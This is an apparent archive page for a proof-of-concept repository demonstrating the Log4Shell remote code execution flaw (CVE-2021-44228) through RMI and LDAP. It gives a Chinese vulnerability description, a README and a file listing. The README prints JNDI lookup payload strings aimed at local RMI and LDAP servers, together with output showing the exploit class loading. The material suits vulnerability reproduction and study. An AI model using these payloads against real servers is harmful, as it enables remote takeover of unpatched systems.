Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j 代码问题漏洞

Source
https://github.com/mzlogin/CVE-2021-44228-Demo
Associated Vulnerability
Title:Apache Log4j 代码问题漏洞 (CVE-2021-44228)
Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
Description
Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP
Readme
# CVE-2021-44228-Demo

利用 CVE-2021-44228,通过 RMI 和 LDAP 两种方式远程注入代码的示例。

![](./result.png)

```
Exploit class from RMI Server loaded
Hello, ${jndi:rmi://127.0.0.1:1099/exploit}
Exploit class from LDAP Server loaded
Hello, ${jndi:ldap://127.0.0.1:1389/org.mazhuang.ldap.Exploit}
```

RmiServer 和 LdapServer 启动依赖 Python3。

## 参考

- [Apache Log4j2远程代码执行漏洞复现](https://zhuanlan.zhihu.com/p/443689489)
- [Log4j高危漏洞!具体原因解析!全网第一!](https://www.bilibili.com/video/BV1FL411E7g3) 和 [Log4j高危漏洞 (补充视频)](https://www.bilibili.com/video/BV18U4y1K72L/)
- [Log4j Lookups](https://logging.apache.org/log4j/2.x/manual/lookups.html)
- [Apache Log4j2从RCE到RC1绕过](https://xz.aliyun.com/t/10649)
- [tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce)
- [PSA: Log4Shell and the current state of JNDI injection](https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
File Snapshot

 [4.0K]  /data/pocs/3b9827f014cc9e9b1edc011a4bae94e447afd641
├── [4.0K]  ldap-server
│   ├── [ 663]  pom.xml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           └── [4.0K]  java
│               └── [4.0K]  org
│                   └── [4.0K]  mazhuang
│                       └── [4.0K]  ldap
│                           ├── [ 222]  Exploit.java
│                           └── [1.4K]  LdapServer.java
├── [1.0K]  LICENSE
├── [ 749]  pom.xml
├── [1.0K]  README.md
├── [ 79K]  result.png
├── [4.0K]  rmi-server
│   ├── [ 663]  pom.xml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           └── [4.0K]  java
│               └── [4.0K]  org
│                   └── [4.0K]  mazhuang
│                       └── [4.0K]  rmi
│                           ├── [ 220]  Exploit.java
│                           └── [1.6K]  RmiServer.java
├── [4.0K]  server
│   ├── [1.0K]  pom.xml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           ├── [4.0K]  java
│           │   └── [4.0K]  org
│           │       └── [4.0K]  mazhuang
│           │           └── [ 852]  Main.java
│           └── [4.0K]  resources
│               └── [ 320]  log4j2.xml
└── [4.0K]  tools
    └── [ 41M]  marshalsec-0.0.3-SNAPSHOT-all.jar

22 directories, 14 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.